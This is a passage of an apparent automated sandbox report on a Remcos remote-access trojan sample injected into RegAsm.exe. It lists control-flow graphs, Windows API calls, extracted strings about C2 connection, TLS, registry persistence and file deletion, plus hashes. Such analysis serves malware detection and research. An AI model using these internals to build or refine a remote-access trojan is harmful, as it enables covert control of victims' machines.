306->93 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 357 40f159-40f16c call 401e65 call 401fab 346->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->358 367 40f1cc-40f1df call 401e65 call 401fab 357->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 402 40f240-40f241 SetProcessDEPPolicy 380->402 403 40f243-40f256 CreateThread 380->403 402->403 406 40f264-40f26b 403->406 407 40f258-40f262 CreateThread 403->407 408 40f279-40f280 406->408 409 40f26d-40f277 CreateThread 406->409 407->406 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->157 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                                  APIs
                                                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                                                    • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                  • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                  • API String ID: 2830904901-3701325316
                                                                  • Opcode ID: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                                                                  • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                  • Opcode Fuzzy Hash: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                                                                  • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 567 415210-415225 call 404f51 call 4048c8 560->567 568 4151e5-41520b call 402093 * 2 call 41b4ef 560->568 583 415aa3-415ab5 call 404e26 call 4021fa 561->583 567->583 584 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 567->584 568->583 596 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 583->596 597 415add-415ae5 call 401e8d 583->597 648 415380-41538d call 405aa6 584->648 649 415392-4153b9 call 401fab call 4135a6 584->649 596->597 597->477 648->649 655 4153c0-41577f call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->655 656 4153bb-4153bd 649->656 782 415781 call 404aa1 655->782 656->655 783 415786-415a0a call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a0f-415a16 783->901 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->583
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                  • String ID: | $%I64u$5.0.0 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                  • API String ID: 524882891-2158775120
                                                                  • Opcode ID: 9497a8cef06d9965077653e5d14c9f88a6240dc4e4311364d1378025ff75ed42
                                                                  • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                                  • Opcode Fuzzy Hash: 9497a8cef06d9965077653e5d14c9f88a6240dc4e4311364d1378025ff75ed42
                                                                  • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 925 414d86-414dc2 926 414dc8-414ddd GetSystemDirectoryA 925->926 927 414edd-414ee8 925->927 928 414ed3 926->928 929 414de3-414e2f call 441a3e call 441a98 LoadLibraryA 926->929 928->927 934 414e31-414e3b GetProcAddress 929->934 935 414e46-414e80 call 441a3e call 441a98 LoadLibraryA 929->935 936 414e42-414e44 934->936 937 414e3d-414e40 FreeLibrary 934->937 948 414e82-414e8c GetProcAddress 935->948 949 414ecf-414ed2 935->949 936->935 939 414e97 936->939 937->936 941 414e99-414eaa GetProcAddress 939->941 943 414eb4-414eb7 FreeLibrary 941->943 944 414eac-414eb0 941->944 947 414eb9-414ebb 943->947 944->941 946 414eb2 944->946 946->947 947->949 952 414ebd-414ecd 947->952 950 414e93-414e95 948->950 951 414e8e-414e91 FreeLibrary 948->951 949->928 950->939 950->949 951->950 952->949 952->952
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                  • API String ID: 2490988753-744132762
                                                                  • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                  • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                                  • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                  • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • connect.WS2_32(?,?,?), ref: 004048E0
                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                  • String ID: 0If$Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                  • API String ID: 994465650-1299365962
                                                                  • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                                                  • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                                  • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                                                  • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1028 40da34-40da59 call 401f86 1031 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1028->1031 1032 40da5f 1028->1032 1055 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1031->1055 1034 40da70-40da7e call 41b5b4 call 401f13 1032->1034 1035 40da91-40da96 1032->1035 1036 40db51-40db56 1032->1036 1037 40daa5-40daac call 41bfb7 1032->1037 1038 40da66-40da6b 1032->1038 1039 40db58-40db5d 1032->1039 1040 40da9b-40daa0 1032->1040 1041 40db6e 1032->1041 1042 40db5f-40db64 call 43c0cf 1032->1042 1059 40da83 1034->1059 1044 40db73-40db78 call 43c0cf 1035->1044 1036->1044 1056 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1037->1056 1057 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1037->1057 1038->1044 1039->1044 1040->1044 1041->1044 1052 40db69-40db6c 1042->1052 1058 40db79-40db7e call 409057 1044->1058 1052->1041 1052->1058 1056->1059 1064 40da87-40da8c call 401f09 1057->1064 1058->1031 1059->1064 1064->1031
                                                                  APIs
                                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DB9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LongNamePath
                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                  • API String ID: 82841172-425784914
                                                                  • Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                                                  • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                                  • Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                                                  • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1110 44ac49-44ac62 1111 44ac64-44ac74 call 446766 1110->1111 1112 44ac78-44ac7d 1110->1112 1111->1112 1120 44ac76 1111->1120 1114 44ac7f-44ac87 1112->1114 1115 44ac8a-44acae MultiByteToWideChar 1112->1115 1114->1115 1117 44acb4-44acc0 1115->1117 1118 44ae41-44ae54 call 434fcb 1115->1118 1121 44ad14 1117->1121 1122 44acc2-44acd3 1117->1122 1120->1112 1126 44ad16-44ad18 1121->1126 1123 44acd5-44ace4 call 457190 1122->1123 1124 44acf2-44ad03 call 446137 1122->1124 1129 44ae36 1123->1129 1135 44acea-44acf0 1123->1135 1124->1129 1136 44ad09 1124->1136 1126->1129 1130 44ad1e-44ad31 MultiByteToWideChar 1126->1130 1134 44ae38-44ae3f call 435e40 1129->1134 1130->1129 1133 44ad37-44ad49 call 448bb3 1130->1133 1140 44ad4e-44ad52 1133->1140 1134->1118 1139 44ad0f-44ad12 1135->1139 1136->1139 1139->1126 1140->1129 1142 44ad58-44ad5f 1140->1142 1143 44ad61-44ad66 1142->1143 1144 44ad99-44ada5 1142->1144 1143->1134 1145 44ad6c-44ad6e 1143->1145 1146 44ada7-44adb8 1144->1146 1147 44adf1 1144->1147 1145->1129 1148 44ad74-44ad8e call 448bb3 1145->1148 1150 44add3-44ade4 call 446137 1146->1150 1151 44adba-44adc9 call 457190 1146->1151 1149 44adf3-44adf5 1147->1149 1148->1134 1162 44ad94 1148->1162 1153 44adf7-44ae10 call 448bb3 1149->1153 1154 44ae2f-44ae35 call 435e40 1149->1154 1150->1154 1166 44ade6 1150->1166 1151->1154 1165 44adcb-44add1 1151->1165 1153->1154 1168 44ae12-44ae19 1153->1168 1154->1129 1162->1129 1167 44adec-44adef 1165->1167 1166->1167 1167->1149 1169 44ae55-44ae5b 1168->1169 1170 44ae1b-44ae1c 1168->1170 1171 44ae1d-44ae2d WideCharToMultiByte 1169->1171 1170->1171 1171->1154 1172 44ae5d-44ae64 call 435e40 1171->1172 1172->1134
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                                  • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                                  • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                                  • __freea.LIBCMT ref: 0044AE30
                                                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                  • __freea.LIBCMT ref: 0044AE39
                                                                  • __freea.LIBCMT ref: 0044AE5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 3864826663-0
                                                                  • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                                  • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                                  • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                                  • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1193 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1204 41b35d-41b366 1193->1204 1205 41b31c-41b347 call 4135a6 call 401fab StrToIntA 1193->1205 1207 41b368-41b36d 1204->1207 1208 41b36f 1204->1208 1215 41b355-41b358 call 401fd8 1205->1215 1216 41b349-41b352 call 41cf69 1205->1216 1210 41b374-41b37f call 40537d 1207->1210 1208->1210 1215->1204 1216->1215
                                                                  APIs
                                                                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                    • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                    • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                    • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                  • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                  • API String ID: 1866151309-2070987746
                                                                  • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                                                  • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                                  • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                                                  • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountEventTick
                                                                  • String ID: !D@$NG
                                                                  • API String ID: 180926312-2721294649
                                                                  • Opcode ID: f36f2d49ab2961808af81894e896c9fe5fba8881db75f6a1af782146f5b63878
                                                                  • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                                  • Opcode Fuzzy Hash: f36f2d49ab2961808af81894e896c9fe5fba8881db75f6a1af782146f5b63878
                                                                  • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1358 404f51-404f5f 1359 404f65-404f6c 1358->1359 1360 404fea 1358->1360 1362 404f74-404f7b 1359->1362 1363 404f6e-404f72 1359->1363 1361 404fec-404ff1 1360->1361 1364 404fc0-404fe8 CreateEventA CreateThread 1362->1364 1365 404f7d-404fbb GetLocalTime call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1362->1365 1363->1364 1364->1361 1365->1364
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                  Strings
                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Create$EventLocalThreadTime
                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                  • API String ID: 2532271599-1507639952
                                                                  • Opcode ID: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                                                                  • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                                  • Opcode Fuzzy Hash: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                                                                  • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1375 41376f-413786 RegCreateKeyA 1376 413788-4137bd call 40247c call 401fab RegSetValueExA RegCloseKey 1375->1376 1377 4137bf 1375->1377 1378 4137c1-4137cf call 401fd8 1376->1378 1377->1378
                                                                  APIs
                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                  • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                                  • RegCloseKey.KERNEL32(?), ref: 004137B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateValue
                                                                  • String ID: pth_unenc
                                                                  • API String ID: 1818849710-4028850238
                                                                  • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                                                  • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                                  • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                                                  • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                  • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3360349984-0
                                                                  • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                                                  • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                                  • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
